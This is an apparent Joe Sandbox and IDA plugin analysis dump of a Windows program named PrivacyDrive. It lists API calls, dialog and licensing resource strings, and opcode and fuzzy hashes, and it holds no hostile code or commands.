                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00421940
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00421958
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 00421985
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00421997
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 004219C4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004219D6
                                  • Part of subcall function 0041EF30: EnterCriticalSection.KERNEL32(005BDCE4,?,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?), ref: 0041EF3B
                                  • Part of subcall function 0041EF30: LeaveCriticalSection.KERNEL32(005BDCE4,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?,0041E1DB), ref: 0041EF4E
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                • Opcode ID: a97565df34e25258d7543389a541b863e23140e12952659115622623b9b84d9e
                                • Instruction ID: 87115809505b870b171f376c7b5103c8a953e77f1af414b46e627d12f181bead
                                • Opcode Fuzzy Hash: a97565df34e25258d7543389a541b863e23140e12952659115622623b9b84d9e
                                • Instruction Fuzzy Hash: 78814738390712B1DA186D726D13FAF89493B60B44F44452BFE09A62D2EF9CEC46D5EC
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00408593), ref: 0046E4F0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E508
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD,?,?,00408593), ref: 0046E535
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E547
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD,?,?,00408593), ref: 0046E574
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E586
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                • Opcode ID: 544724d2402e0c1b3abb79e0585ea74f6b2f61e244ec6e1b70a05d979e077fb9
                                • Instruction ID: db71465a6864359a492602fe9e5c16e9fc8931a9859a05d1f20c1c4b78a28152
                                • Opcode Fuzzy Hash: 544724d2402e0c1b3abb79e0585ea74f6b2f61e244ec6e1b70a05d979e077fb9
                                • Instruction Fuzzy Hash: 5D81DC3838071122EA187637AD13F6B59956B44F44F04406EFA0AA72C2FFDDD941A6EE
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004166B0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004166C8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 004166F5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416707
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 00416734
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416746
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BACKGROUND_BEGIN$BACKGROUND_END$BORDER$BORDER_BACKGROUND$BOTTOM_BACKGROUND_BEGIN$BOTTOM_BACKGROUND_END$BOTTOM_GLOSS_BEGIN$BOTTOM_GLOSS_END$BOTTOM_GLOSS_HEIGHT$BUTTON_ICON_CREATE$BUTTON_ICON_CREATE_DISABLE$BUTTON_ICON_MOUNT$BUTTON_ICON_OPEN$BUTTON_MAX_WIDTH$BUTTON_X$CHECKBOX_X$CHECKBOX_Y$CREATE_BUTTON_Y$Dialog$FILLET$FILLET2$MOUNT_BUTTON_Y$OPEN_BUTTON_Y$SPLASH$TITLE_BACKGROUND$TITLE_TEXT$TITLE_TEXT_X$TITLE_TEXT_Y
                                • API String ID: 904232820-1141765326
                                • Opcode ID: 35522f0b04ca4be707e10ffd28e030f0d56883e665f9f3f9c3e985f07e1a6f6e
                                • Instruction ID: 2fc7c05858f9a66c6cfd96f8bf2dbc2561cf7bfbee2527b4f19f709cef2b5722
                                • Opcode Fuzzy Hash: 35522f0b04ca4be707e10ffd28e030f0d56883e665f9f3f9c3e985f07e1a6f6e
                                • Instruction Fuzzy Hash: 2C51F07C3A13016BFE1466724D53BAA19857B44F45F05002EBE05AF3C2FFA9E94182AE
                                APIs
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A204
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A209
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A224
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A229
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A244
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A249
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A264
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A269
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A284
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A289
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2A4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2A9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2C4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2C9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2E4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2E9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A304
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A309
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A324
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A329
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A344
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A349
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A364
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A369
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A384
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A389
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3A4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3A9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3C4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3C9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3E4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3E9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A404
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A409
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DeleteFontFree
                                • String ID:
                                • API String ID: 812453785-0
                                • Opcode ID: 85f1a0658d7a6c1520944a73693c8b73f796a5a2d80e79b62369b9ceba35918b
                                • Instruction ID: a600931a1200e0b0a12dd47269ba79f86ba2d1d5da6e5a05ecaeb6b46089f4f5
                                • Opcode Fuzzy Hash: 85f1a0658d7a6c1520944a73693c8b73f796a5a2d80e79b62369b9ceba35918b
                                • Instruction Fuzzy Hash: 1361E470500A05EFDB22DF76CD58B8BBBF5BF45300F5044A9D85997260EB36EA14EB05
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004372E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004372F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,ABOUT), ref: 00437325
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00437337
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,ABOUT), ref: 00437364
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00437376
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: ABOUT$Dialog$PM_BUTTON_ACTIVATE_Y$PM_BUTTON_BUY_NOW_Y$PM_COPYRIGHT_Y$PM_ICON_X$PM_ICON_Y$PM_LINE_1_Y$PM_LINE_2_Y$PM_LINK_EMAIL_X$PM_LINK_EMAIL_Y$PM_LINK_WEBSITE_X$PM_LINK_WEBSITE_Y$PM_STRING_EXPIRATION_DATE_X$PM_STRING_EXPIRATION_DATE_Y$PM_STRING_LICENSE_NAME_X$PM_STRING_LICENSE_NAME_Y$PM_STRING_LICENSE_TYPE_X$PM_STRING_LICENSE_TYPE_Y$PM_STRING_WARNING_HEIGHT$PM_STRING_WARNING_WIDTH$PM_STRING_WARNING_X$PM_STRING_WARNING_Y$PM_TITLE_Y$PM_VERSION_Y
                                • API String ID: 904232820-3172832796
                                • Opcode ID: 5f5d2d318a346c737033fad44e2267e20554e4465a3fba6b5af3b0e289f42026
                                • Instruction ID: 3ab152cbf2ec4c6e8b681e91df5937ecf2c508342c02bdc27f6dbbc580ac0622
                                • Opcode Fuzzy Hash: 5f5d2d318a346c737033fad44e2267e20554e4465a3fba6b5af3b0e289f42026
                                • Instruction Fuzzy Hash: EF51F7603853013AEDA97332DC53F7F19966B44F19F05003ABA46BA2C2EFDCDA01969D
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A232A,00403019), ref: 004A2520
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2538
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG), ref: 004A2565
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2577
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,00000000,BASE_DIALOG), ref: 004A25A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A25B6
                                  • Part of subcall function 004A4220: EnterCriticalSection.KERNEL32(005BDCE4,00000000,00000000,?,004A26E3,?,MESSAGE_BOX,00000013,TITLE_HEIGHT,00000012,BORDER,00000011,DOTLINE_BOTTOM,00000010,BUTTON_INTERVAL,0000000F), ref: 004A422C
                                  • Part of subcall function 004A4220: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A26E3,?,MESSAGE_BOX,00000013,TITLE_HEIGHT,00000012,BORDER,00000011,DOTLINE_BOTTOM,00000010,BUTTON_INTERVAL,0000000F,BUTTON_BOTTOM,0000000E), ref: 004A423F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BASE_DIALOG$BORDER$BUTTON_BOTTOM$BUTTON_HEIGHT$BUTTON_INTERVAL$BUTTON_RIGHT$CLIENT_BOTTOM$CLIENT_LEFT$CLIENT_RIGHT$CLIENT_TOP$CONFIRMATION$DOTLINE_BOTTOM$Dialog$ERROR$ICON_X$ICON_Y$INFORAGIN_MIN_HEIGHT$INFORAGIN_MIN_WIDTH$INFORMATION$LEFT$MESSAGE_BOX$TITLE_HEIGHT$WARNING
                                • API String ID: 904232820-3138118559
                                • Opcode ID: 1640581fab820ff2bdfc72f5d70bf52333e9f35beb7892fc70a076206694ddfe
                                • Instruction ID: 5ca2536b4346ff9ed5bfbdf02d6f25b29927509dd26d6d1bd30ed9ba06bc3021
                                • Opcode Fuzzy Hash: 1640581fab820ff2bdfc72f5d70bf52333e9f35beb7892fc70a076206694ddfe
                                • Instruction Fuzzy Hash: BF515434380712ABE94C73764E63F6A9D447B55B49F04012BBE05BA3C1EFD8E901936D
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004375B8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,ABOUT), ref: 004375DF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000011,STR_WARNING,00000010,STR_NEVER_EXPIRE,0000000F,STR_EXPIRED,0000000E,STR_FULL_VERSION,0000000D,STR_EVALUATION,0000000C,STR_PERIOD,00000013,STR_TRIAL_USER,0000000A), ref: 00437768
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: ABOUT$BUTTON_ACTIVATE$BUTTON_BUY_NOW$BUTTON_OK$BUTTON_RENEW_NOW$Dialog$LABEL_EMAIL$LABEL_EXPIRATION_DATE$LABEL_LICENSE_INFORMATION$LABEL_LICENSE_NAME$LABEL_LICENSE_TYPE$LABEL_VERSION$LABEL_WEBSITE$PZ$STR_EVALUATION$STR_EXPIRED$STR_FULL_VERSION$STR_NEVER_EXPIRE$STR_PERIOD$STR_TRIAL_USER$STR_WARNING
                                • API String ID: 2978645861-1264822288
                                • Opcode ID: 00a2a97fe1f60d0aec0fcebd03ac9dd2d64f8ef7b0db57bfe3160a173c2d7c58
                                • Instruction ID: 09f988efe70033d8e473a9f7232813dacc2a91003eb6b0b4d5e56ea2171130c4
                                • Opcode Fuzzy Hash: 00a2a97fe1f60d0aec0fcebd03ac9dd2d64f8ef7b0db57bfe3160a173c2d7c58
                                • Instruction Fuzzy Hash: 1E31BE623C472133EA2B25322E17FAE08491B48F55F24605ABE45ADAC1FFCCEE41D55D
                                APIs
                                  • Part of subcall function 004A6F60: EnterCriticalSection.KERNEL32(005BE2CC,0049B07A,0049B078), ref: 004A7032
                                  • Part of subcall function 004A6F60: LeaveCriticalSection.KERNEL32(?,?,?), ref: 004A70D6
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040535D
                                • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00405383
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004053A5
                                • CloseHandle.KERNEL32(00000000), ref: 004053B4
                                • GetLastError.KERNEL32 ref: 004053BA
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004053E6
                                • LocalFree.KERNEL32(?), ref: 00405412
                                • CloseHandle.KERNEL32(00000000), ref: 0040543A
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 0040553F
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040559C
                                • CloseHandle.KERNEL32(00000000), ref: 004055AB
                                • CloseHandle.KERNEL32(00000000), ref: 004055C2
                                • SetLastError.KERNEL32(00000026), ref: 004055CA
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,?), ref: 004055F8
                                • SetLastError.KERNEL32(00000072), ref: 0040567F
                                • CloseHandle.KERNEL32(00000000), ref: 0040568B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
